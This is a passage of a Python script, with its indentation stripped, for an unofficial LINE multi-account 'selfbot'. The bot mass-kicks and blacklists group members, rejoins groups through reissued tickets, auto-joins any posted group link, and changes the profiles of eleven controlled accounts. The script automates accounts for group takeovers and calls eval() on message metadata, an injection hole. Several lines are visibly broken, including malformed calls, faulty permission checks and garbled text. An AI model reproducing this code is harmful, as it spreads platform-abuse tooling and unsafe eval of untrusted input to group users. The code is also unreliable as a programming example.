G.preventJoinByTicket = True
ki6.updateGroup(G)
Ticket = ki6.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if Gmid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki7.getGroup(op.param1)
G.preventJoinByTicket = True
ki7.updateGroup(G)
Ticket = ki7.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if Hmid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki8.getGroup(op.param1)
G.preventJoinByTicket = True
ki8.updateGroup(G)
Ticket = ki8.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if Imid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki9.getGroup(op.param1)
G.preventJoinByTicket = True
ki9.updateGroup(G)
Ticket = ki9.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if Jmid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki10.getGroup(op.param1)
G.preventJoinByTicket = True
ki10.updateGroup(G)
Ticket = ki10.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if op.type == 19:
if op.param3 in Bots:
wait["blacklist"][op.param2] = True
if op.type == 19:
if wait["MProtection"] == True:
if op.param2 not in Bots and staff:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if op.type == 19:
if op.param3 in admin:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
else:
pass
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == profile.mid:
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
X = cl.getGroup(list_[1])
X.preventJoinByTicket = True
cl.updateGroup(X)
except:
cl.sendText(msg.to,"error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata("line://home/post?userMid="+mid+"&postId="+"new_post")
cl.like(url[25:58], url[66:], likeType=1001)
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
ki.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
ki.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
ki.sendText(msg.to,"deleted")
#ki.sendText(msg.to,"deleted")
#kk.sendText(msg.to,"deleted")
#kc.sendText(msg.to,"deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
ki.sendText(msg.to,"It is not in the black list")
#ki.sendText(msg.to,"It is not in the black list")
#kk.sendText(msg.to,"It is not in the black list")
#kc.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
ki.sendText(msg.to,"already")
#ki.sendText(msg.to,"already")
#kk.sendText(msg.to,"already")
#kc.sendText(msg.to,"already")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
ki.sendText(msg.to,"aded")
#ki.sendText(msg.to,"aded")
#kk.sendText(msg.to,"aded")
#kc.sendText(msg.to,"aded")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
ki.sendText(msg.to,"deleted")
#ki.sendText(msg.to,"deleted")
#kk.sendText(msg.to,"deleted")
#kc.sendText(msg.to,"deleted")
#wait["dblacklist"] = False
else:
wait["dblacklist"] = False
ki.sendText(msg.to,"It is not in the black list")
#ki.sendText(msg.to,"It is not in the black list")
#kk.sendText(msg.to,"It is not in the black list")
#kc.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["Key","help","Help"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["Set"]:
if msg.from_ in Bots or staff:
if wait["lang"] == "JP":
cl.sendText(msg.to,Setgroup)
else:
cl.sendText(msg.to,Sett)
elif ("Gn " in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gn ","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
elif ("Cv1 gn " in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Cv1 gn ","")
ki.updateGroup(X)
else:
ki.sendText(msg.to,"It can't be used besides the group.")
elif ("Cv2 gn " in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Cv2 gn ","")
kk.updateGroup(X)
else:
kk.sendText(msg.to,"It can't be used besides the group.")
elif ("Cv3 gn " in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Cv3 gn ","")
kc.updateGroup(X)
else:
kc.sendText(msg.to,"It can't be used besides the group.")
elif "Kick " in msg.text:
if msg.from_ in Bots and staff:
midd = msg.text.replace("Kick ","")
ki.kickoutFromGroup(msg.to,[midd])
elif "1 kick " in msg.text:
midd = msg.text.replace("1 kick ","")
ki.kickoutFromGroup(msg.to,[midd])
elif "2 kick " in msg.text:
midd = msg.text.replace("2 kick ","")
ki2.kickoutFromGroup(msg.to,[midd])
elif "3 kick " in msg.text:
midd = msg.text.replace("3 kick ","")
ki3.kickoutFromGroup(msg.to,[midd])
elif "Invite " in msg.text:
if msg.from_ in Bots or staff:
midd = msg.text.replace("Invite ","")
ki.findAndAddContactsByMid(midd)
ki.inviteIntoGroup(msg.to,[midd])
elif "1 invite " in msg.text:
midd = msg.text.replace("Cv1 invite ","")
ki.findAndAddContactsByMid(midd)
ki.inviteIntoGroup(msg.to,[midd])
elif "2 invite " in msg.text:
midd = msg.text.replace("Cv2 invite ","")
ki2.findAndAddContactsByMid(midd)
ki2.inviteIntoGroup(msg.to,[midd])
elif "3 invite " in msg.text:
midd = msg.text.replace("Cv3 invite ","")
ki3.findAndAddContactsByMid(midd)
ki3.inviteIntoGroup(msg.to,[midd])
elif msg.text in ["Me"]:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
elif msg.text in ["1"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
elif msg.text in ["2"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
ki2.sendMessage(msg)
elif msg.text in ["3"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
ki3.sendMessage(msg)
elif msg.text in ["4"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
ki4.sendMessage(msg)
elif msg.text in ["5"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Emid}
ki5.sendMessage(msg)
elif msg.text in ["6"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Fmid}
ki6.sendMessage(msg)
elif msg.text in ["7"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Gmid}
ki7.sendMessage(msg)
elif msg.text in ["8"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Hmid}
ki8.sendMessage(msg)
elif msg.text in ["9"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Imid}
ki9.sendMessage(msg)
elif msg.text in ["10"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Jmid}
ki10.sendMessage(msg)
elif msg.text in ["Bot"]:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
ki2.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
ki3.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
ki4.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Emid}
ki5.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Fmid}
ki6.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Gmid}
ki7.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Hmid}
ki8.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Imid}
ki9.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Jmid}
ki10.sendMessage(msg)
elif msg.text in ["æ„›ã®ãƒ—レゼント","Gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
cl.sendMessage(msg)
#-----Fungsi List Group------#
elif msg.text in ["List group"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[~]%s\n" % (cl.getGroup(i).name +str (len (cl.getGroup(i).members)))
cl.sendText(msg.to,"========[List Group]========\n"+ h +"Total Group :" +str(len(gid)))
#-----Finish--------#
#-------------Fungsi Creator Start-----------------#
elif msg.text in ["Creator"]:
if msg.toType == 2:
msg.contentType = 13
Creatorbot = "u9e5a757e7b6e466baf87e8f747d96eb5"
try:
msg.contentMetadata = {'mid': Creatorbot}
except:
Creatorbot = "Error"
cl.sendText(msg.to, "My Creator : IP/nhttp://line.me/ti/p/zuFNPuXyEb")
cl.sendMessage(msg)
#-------------Fungsi Creator Finish-----------------#
#-------------Fungsi Kick By Tag---------------------#
elif ("Bye " in msg.text):
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
random.choice(KAC).sendText(op.param1, cl.getContact(op.param3).displayName + " ~Sorry (*´・ω・*)")
except:
pass
#-------------Fungsi Kick By Tag---------------------#
#-------------Fungsi Ban By Tag---------------------#
elif ("BL " in msg.text):
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes Blacklist")
except:
pass
#-------------Fungsi Ban By Tag Finish---------------------#
elif msg.text in ["cancel","Cancel"]:
if msg.from_ in Bots or staff:
if msg.toType == 2:
X = ki.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
ki.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"No one is inviting")
else:
ki.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv cancel","Bot cancel"]:
if msg.toType == 2:
G = ki.getGroup(msg.to)
if G.invitee is not None:
gInviMids = [contact.mid for contact in G.invitee]
ki.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"No one is inviting")
else:
ki.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
#elif "gurl" == msg.text:
#print cl.getGroup(msg.to)
##cl.sendMessage(msg)
elif msg.text in ["Open","Link on"]:
if msg.from_ in Bots or staff:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = False
ki.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done")
else:
ki.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["1 open","Cv1 link on"]:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = False
ki.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done ")
else:
ki.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Close","Link off"]:
if msg.from_ in Bots or staff:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = True
ki.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done")
else:
ki.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["1 close","Cv1 link off"]:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = True
ki.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done ")
else:
ki.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif "jointicket " in msg.text.lower():
rplace=msg.text.lower().replace("jointicket ")
if rplace == "on":
wait["atjointicket"]=True
elif rplace == "off":
wait["atjointicket"]=False
cl.sendText(msg.to,"Auto Join Group by Ticket is %s" % str(wait["atjointicket"]))
elif '/ti/g/' in msg.text.lower():
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(msg.text)
n_links=[]
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
if wait["atjointicket"] == True:
group=cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.id,ticket_id)
cl.sendText(msg.to,"Sukses join ke grup %s" % str(group.name))
elif msg.text == "Ginfo":
if msg.toType == 2:
ginfo = ki.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
u = "close"
else:
u = "open"
ki.sendText(msg.to,"[group name]\n" + str(ginfo.name) + "\n[gid]\n" + msg.to + "\n[group creator]\n" + gCreator + "\n[profile status]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\nmembers:" + str(len(ginfo.members)) + "members\npending:" + sinvitee + "people\nURL:" + u + "it is inside")
else:
ki.sendText(msg.to,"[group name]\n" + str(ginfo.name) + "\n[gid]\n" + msg.to + "\n[group creator]\n" + gCreator + "\n[profile status]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif "Id" == msg.text:
cl.sendText(msg.to,msg.to)
elif "Mid all" == msg.text:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,Amid)
ki2.sendText(msg.to,Bmid)
ki3.sendText(msg.to,Cmid)
ki4.sendText(msg.to,Dmid)
ki5.sendText(msg.to,Emid)
ki6.sendText(msg.to,Fmid)
ki7.sendText(msg.to,Gmid)
ki8.sendText(msg.to,Hmid)
ki9.sendText(msg.to,Imid)
ki10.sendText(msg.to,Jmid)
elif "Mid" == msg.text:
cl.sendText(msg.to,mid)
elif msg.text in ["Welcome"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "247",
"STKPKGID": "3",
"STKVER": "100" }
cl.sendMessage(msg)
elif msg.text in ["TL:"]:
tl_text = msg.text.replace("TL:","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif "MeUp n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("MeUp n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"name " + string + "Done")
elif "1Up n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("1Up n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"name " + string + "Done")
elif "2Up n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("2Up n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki2.updateProfile(profile)
ki2.sendText(msg.to,"name" + string + "Done")
elif "3Up n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("3Up n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki3.updateProfile(profile)
ki3.sendText(msg.to,"name" + string + "Done")
elif "4Up n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("4Up n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki4.updateProfile(profile)
ki4.sendText(msg.to,"name" + string + "Done")
elif "5Up n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("5Up n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki5.updateProfile(profile)
ki5.sendText(msg.to,"name" + string + "Done")
elif "6Up n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("6Up n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki6.updateProfile(profile)
ki6.sendText(msg.to,"name" + string + "Done")
elif "7Up n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("7Up n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki7.updateProfile(profile)
ki7.sendText(msg.to,"name" + string + "Done")
elif "8Up n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("8Up n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki8.updateProfile(profile)
ki8.sendText(msg.to,"name" + string + "Done")
elif "9Up n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("9Up n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki9updateProfile(profile)
ki9.sendText(msg.to,"name " + string + "Done")
elif "10Up n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("10Up n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki10.updateProfile(profile)
ki10.sendText(msg.to,"name " + string + "Done")
elif "AllUp n " in msg.text:
string = msg.text.replace("AllUp n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki2.updateProfile(profile)
ki3.updateProfile(profile)
ki4.updateProfile(profile)
ki5.updateProfile(profile)
ki6.updateProfile(profile)
ki7.updateProfile(profile)
ki8.updateProfile(profile)
ki9.updateProfile(profile)
ki10.updateProfile(profile)
ki.sendText(msg.to,"name" + string + "Done")
ki2.sendText(msg.to,"name" + string + "Done")
ki3.sendText(msg.to,"name" + string + "Done")
ki4.sendText(msg.to,"name" + string + "Done")
ki5.sendText(msg.to,"name" + string + "Done")
ki6.sendText(msg.to,"name" + string + "Done")
ki7.sendText(msg.to,"name" + string + "Done")
ki8.sendText(msg.to,"name" + string + "Done")
ki9.sendText(msg.to,"name" + string + "Done")
ki10.sendText(msg.to,"name" + string + "Done")
elif msg.text in ["Mc "]:
mmid = msg.text.replace("Mc ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
#---------------#
elif msg.text in ["AllProtection on"]:
if msg.from_ in Bots or staff:
if wait["AllProtection"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Protection On")
else:
cl.sendText(msg.to,"done")
else:
wait["MProtection"] = True
wait["Protectguest"] = True
wait["ProtectQR"] = True
wait["Protectcancel"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Protection On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["AllProtection off"]:
if msg.from_ in Bots or staff:
if wait["AllProtection"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Protection Off")
else:
cl.sendText(msg.to,"done")
else:
wait["MProtection"] = False
wait["Protectguest"] = False
wait["ProtectQR"] = False
wait["Protectcancel"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Protection Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["MProtection on"]:
if msg.from_ in Bots or staff:
if wait["MProtection"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection On")
else:
cl.sendText(msg.to,"done")
else:
wait["MProtection"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["MProtection off"]:
if msg.from_ in Bots or staff:
if wait["MProtection"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection Off")
else:
cl.sendText(msg.to,"done")
else:
wait["MProtection"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Blockinvite on","guest on"]:
if msg.from_ in Bots or staff:
if wait["Protectguest"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Block Invitation On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectguest"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Block Invitation On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Blockinvite off","guest off"]:
if msg.from_ in Bots or staff:
if wait["Protectguest"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Blockinvitation Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectguest"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Blockinvitation Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qrp on","qr on"]:
if msg.from_ in Bots or staff:
if wait["ProtectQR"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"QR Protection On")
else:
cl.sendText(msg.to,"done")
else:
wait["ProtectQR"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"QR Protection On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qrp off","qr off"]:
